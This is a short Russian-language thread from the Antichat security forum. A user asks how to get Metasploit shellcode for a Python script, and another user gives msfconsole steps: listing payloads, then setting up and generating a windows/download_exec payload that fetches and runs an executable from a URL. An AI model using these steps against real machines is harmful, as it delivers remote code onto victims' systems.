HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Где взять взять шеллкоды для метасплойта???
  #1  
Старый 28.04.2010, 11:18
Glynec
Участник форума
Регистрация: 30.01.2008
Сообщений: 113
С нами: 9620918

Репутация: 47
По умолчанию Где взять взять шеллкоды для метасплойта???

Нужно наваять шелкод на ПИТОНЕ ..http://metasploit.com:55555/PAYLOADS неработает почемуто(((((
 
Ответить с цитированием

  #2  
Старый 28.04.2010, 12:20
overxor
Новичок
Регистрация: 11.09.2009
Сообщений: 23
С нами: 8771234

Репутация: 23
По умолчанию

Устанаваливаешь metasploit (думаю не надо описывать как это делать)

Запускаешь
Цитата:
$ msfconsole
msf > show payloads # Просматриваешь все шелкоды
Payloads
========

Name Rank Description
---- ---- -----------
aix/ppc/shell_bind_tcp normal AIX Command Shell, Bind TCP Inline


windows/x64/shell_reverse_tcp normal Windows x64 Command Shell, Reverse TCP Inline
windows/x64/vncinject/bind_tcp normal Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager
windows/x64/vncinject/reverse_tcp normal Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager

msf > info windows/download_exec # Просматриваешь информацию о шелкоде
...
msf> use windows/download_exec # выбираешь понравившийся тебе шелкод
msf payload(download_exec) > set URL http://site.com/file.exe # устанавливаешь параметры шелкода
msf payload(download_exec) > generate -t ruby # генерируешь шелкод под ruby синтаксис(т.к. для питоновского нет, но ruby похож на него)
ну или все перечисленное можно сделать в одну команду
Цитата:
msfpayload windows/download_exec URL=http://site.com/file.exe ruby
теперь убери в каждой строке "+", а в начало поставь "buf +="
 
Ответить с цитированием

  #3  
Старый 28.04.2010, 12:32
Glynec
Участник форума
Регистрация: 30.01.2008
Сообщений: 113
С нами: 9620918

Репутация: 47
По умолчанию

Ммм оч интересн overxor неподскажешь шелл на руби будет пахать в питоновском скрипте? Просто я помню что на http://metasploit.com:55555/PAYLOADS была прямо вкладка Руби
 
Ответить с цитированием

  #4  
Старый 28.04.2010, 12:40
overxor
Новичок
Регистрация: 11.09.2009
Сообщений: 23
С нами: 8771234

Репутация: 23
По умолчанию

Шел не на руби, он подготовлен для использование в руби(Тобишь ctrl+c ctrl+v). Что тебе мешает эту строку присвоить переменной в питоне и использовать ее?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Наши статьи, FAQи, обзоры, релизы. оlbaneс Социальные сети 11 01.05.2010 16:44



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.